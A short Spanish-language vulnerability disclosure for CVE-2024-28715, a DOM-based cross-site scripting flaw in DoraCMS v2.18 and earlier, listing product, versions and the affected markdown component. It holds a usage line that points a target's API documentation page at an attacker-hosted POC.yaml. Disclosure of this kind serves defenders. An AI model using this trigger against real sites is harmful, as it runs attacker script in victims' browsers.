
Prueba de concepto de exploit para CVE-2024-28715, una vulnerabilidad XSS basada en DOM en DoraCMS v2.18 y versiones anteriores, activada mediante la función markdown0 en el endpoint de documentación de la API.
[ID de CVE]
CVE-2024-28715
[PRODUCTO]
DoraCMS
[Versión]
DoraCMS v2.18 y anteriores
[TIPO DE PROBLEMA]
XSS basado en DOM.
[DESCRIPCIÓN]
Vulnerabilidad de Cross-Site Scripting (XSS) en DOraCMS v2.18 y anteriores permite a un atacante remoto ejecutar código arbitrario a través de la función markdown0 en el endpoint /app/public/apidoc/oas3/wrap-components/markdown.jsx.
[Uso]
https://[target-site]/static/apidoc/index.html?url=https://[your-site]/POC.yaml